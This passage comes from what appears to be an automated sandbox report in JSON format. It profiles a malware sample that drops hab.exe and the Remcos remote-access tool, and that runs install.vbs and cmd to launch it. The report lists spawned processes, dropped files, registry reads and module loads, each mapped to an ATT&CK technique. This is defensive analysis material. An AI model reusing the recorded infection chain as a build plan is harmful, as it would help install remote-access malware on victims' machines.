api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002208)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WScript.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WScript.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hab.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hab.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75150000\n \"hab.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75150000\n \"WScript.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75150000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75150000\n \"remcos.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75150000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"hab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"hab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"hab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (UID: 00000000-00004744)\n Spawned process \"hab.exe\" (UID: 00000000-00003504)\n Spawned process \"hab.exe\" (UID: 00000000-00004488)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005392)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00005428)\n Spawned process \"remcos.exe\" (UID: 00000000-00005488)\n Spawned process \"remcos.exe\" (UID: 00000000-00005656)\n Spawned process \"hab.exe\" (UID: 00000000-00005744)\n Spawned process \"hab.exe\" (UID: 00000000-00004300)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003576)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00005984)\n Spawned process \"remcos.exe\" (UID: 00000000-00005944)\n Spawned process \"remcos.exe\" (UID: 00000000-00003476)\n Spawned process \"hab.exe\" (UID: 00000000-00003996)\n Spawned process \"hab.exe\" (UID: 00000000-00006020)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003016)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00003564)\n Spawned process \"remcos.exe\" (UID: 00000000-00002916)\n Spawned process \"remcos.exe\" (UID: 00000000-00002208)\n Spawned process \"hab.exe\" (UID: 00000000-00001392)\n Spawned process \"hab.exe\" (UID: 00000000-00001988)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (UID: 00000000-00004744)\n Spawned process \"hab.exe\" (UID: 00000000-00003504)\n Spawned process \"hab.exe\" (UID: 00000000-00004488)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00005392)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00005428)\n Spawned process \"remcos.exe\" (UID: 00000000-00005488)\n Spawned process \"remcos.exe\" (UID: 00000000-00005656)\n Spawned process \"hab.exe\" (UID: 00000000-00005744)\n Spawned process \"hab.exe\" (UID: 00000000-00004300)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003576)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00005984)\n Spawned process \"remcos.exe\" (UID: 00000000-00005944)\n Spawned process \"remcos.exe\" (UID: 00000000-00003476)\n Spawned process \"hab.exe\" (UID: 00000000-00003996)\n Spawned process \"hab.exe\" (UID: 00000000-00006020)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003016)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00003564)\n Spawned process \"remcos.exe\" (UID: 00000000-00002916)\n Spawned process \"remcos.exe\" (UID: 00000000-00002208)\n Spawned process \"hab.exe\" (UID: 00000000-00001392)\n Spawned process \"hab.exe\" (UID: 00000000-00001988)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"remcos.exe\" (UID: 00000000-00005488) was launched with new environment variables: \"PROMPT=\"$P$G\"\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"hab.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"hab.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"remcos.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"remcos.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"explorer.exe\" (Indicator: \"explorer.exe\"; File: \"00000000-00004488.00000001.130089.00414000.00000004.mdmp\")\n Found string \"explorer.exe,\" (Indicator: \"explorer.exe\"; File: \"00000000-00004300.00000000.131484.00400000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"hab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"hab.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hab.exe]- [targetUID: 00000000-00005392]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"remcos.exe\" - Location: [%APPDATA%\\remcos\\remcos.exe]- [targetUID: 00000000-00006020]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\IPHlpApi.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\dhcpcsvc.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\CRYPTBASE.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\CRYPTSP.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"hab.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"WScript.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"remcos.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"c:\\windows\\win.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"c:\\02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"c:\\users\\%osuser%\\music\\desktop.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" reads file \"c:\\users\\%osuser%\\downloads\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DLLNXOPTIONS\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe.cfg\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\CRYPTSP.dll\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTSP.dll\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to touch file \"C:\\Windows\\system32\\rsaenh.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe.cfg\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\Windows\\system32\\uxtheme.dll.Config\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe.Local\\\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\02BDDBF5EA7BE0C240F6F4FCE6784938E6DD4339F29A65E1E87AADE246CAD859.EXE.CFG\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\Windows\\System32\\UXTHEME.DLL.CONFIG\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\02BDDBF5EA7BE0C240F6F4FCE6784938E6DD4339F29A65E1E87AADE246CAD859.EXE.LOCAL\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe:Zone.Identifier\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe:ZONE.IDENTIFIER\"\n \"hab.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe.cfg\"\n \"hab.exe\" trying to access non-existent file \"C:\\Windows\\system32\\uxtheme.dll.Config\"\n \"hab.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe.Local\\\"\n \"hab.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\HAB.EXE.CFG\"\n \"hab.exe\" trying to access non-existent file \"C:\\Windows\\System32\\UXTHEME.DLL.CONFIG\"\n \"hab.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\HAB.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" writes file \"c:\\windows\\win.ini\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\hab.exe\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\hab.vbs\"\n \"hab.exe\" writes file \"c:\\windows\\win.ini\"\n \"hab.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\remcos\\remcos.exe\"\n \"hab.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\install.vbs\"\n \"remcos.exe\" writes file \"c:\\windows\\win.ini\"\n \"remcos.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\hab.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" connecting to \"\\ThemeApiPort\"\n \"hab.exe\" connecting to \"\\ThemeApiPort\"\n \"remcos.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": 